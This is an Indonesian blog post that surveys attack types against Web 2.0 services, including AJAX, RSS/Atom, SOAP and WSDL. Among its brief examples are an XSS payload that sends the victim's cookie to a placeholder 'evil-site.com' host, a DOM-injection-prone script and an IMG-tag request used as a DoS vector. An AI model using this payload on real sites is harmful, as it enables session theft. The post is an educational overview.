Monday, June 6, 2016

Jenis-Jenis Serangan pada Layanan Web 2.0

( Skema Layanan Web 2.0 ) Jenis serangan di Asynchronous Javascript and XML ( AJAX ) : 1. Cross-site scripting in ... thumbnail 1 summary
(Skema Layanan Web 2.0)


  • Jenis serangan di Asynchronous Javascript and XML ( AJAX ) :


1. Cross-site scripting in AJAX

XSS merupakan salah satu jenis serangan injeksi code, XSS dilakukan oleh attacker dengan cara memasukkan kode html, javascript atau client script code lainnya kesuatu situs. XSS sudah ada di layanan web 1.0. tapi dengan semakin “powerfullnya” javascript di layanan web 2.0 berdampak pada semakin besar bahaya dari serangan yg mungkin bisa dilakukan dengan javascript. Salah satu hal yang bisa di lakukan dengan XSS adalah mencuri session cookie












http://contoh.com/login.php?variabel=”><script>document.location=’http://<evil-site.com>/cont.php>’+document.cookie</script>






2. XMLHttpRequest Vulnerabilities

XMLHttpRequest adalah sebuah object javascript yang di gunakan untuk mengakses web server secara asingkron, jadi user dapat melakukan aktifitas di sebuah halaman web tanpa me-refresh halaman tersebut (server-side), kerentanannya pada saat kita mengakses situs yang menggunakan AJAX pada koneksi non-SSL, yang mana semua data di transmisikan berbentuk plaintext.

3. Client Side Injections Threats


Eksploitasi XSS dari client-side dapat memberikan akses ke data sensitive, dan client juga data memodifikasinya, DOM (Document Object Model ) Injection adalah salah satu tipe dari XSS di layanan web 2.0 .

Contoh :

<script>
Var pos=document.URL.indexOf(“name=”)+5;
Document.write(document.URL.substring(pos,document.URL.length));
</script>

4. AJAX Bridging

Layanan AJAX hanya dapat saling berkomunikasi dengan servernya sendiri, muncul masalah keamanan apabila layanan AJAX mau di hubungkan dengan situs pihak ketiga, penyerang (bisa jadi pihak ketiga) bisa memanfaatkan ini untuk mengakses layanan yang tidak di izinkan.

5. Denial Of Service (DOS)

Serangan Denial of Service bisa di sisipkn di dalam XMLHttpRequest dan bisa melancarkan serangan tersebut ke server lain.

Contoh :

<IMG SRC=”http://example.com/cgi-bin/tes.cgi?a=b”>
  • Jenis Serangan di RSS / Atom :


1. RSS / Atom Injection

RSS feed biasanya di gunakan untuk sharing informasi antara portal dan aplikasi web, timbul masalah keamanan karena ada kemungkinan attacker dapat me-”nginject” source code dari RSS tersebut, sehingga informasi yang di berikan aplikasi web akan berbeda dengan yang di tampilkan di portal.
  • Jenis Serangan di SOAP ( Simple Object Access Protocol ) :
1. Parameter Manipulation via SOAP


Semua layanan web yang berbasis XML mendapatkan informasi dan pesan dari SOAP, seseorang bisa saja memanipulasi variabel, contohnya : “<id>10</id>” ini adalah salah satu contoh pesan SOAP, seseorang bisa memanipulasi pesan ini dengan mencoba menginjectnya, mulai dari SQL, LDAP,XPATH, command shell dan lain lain.
  • Jenis Serangan di Web Service
1. WSDL (Web Services Definition Languange) Scanning Enumeration

WSDL adalah format XML yang di kirim untuk mendeskripsikan web service.

WSDL mendefinisikan :
=> Pesan-pesan (baik yang abstrak dan kongkrit) yang dikirim ke dan menuju web service
=>koleksi-koleksi digital dari pesan-pesan (port type, antarmuka)
=> Di mana servis ditempatkan
Karena informasi yang di bawa WSDL ini sangat sensitive, attacker bisa memanfaatkannya untuk menyerang web service.

No comments

Post a Comment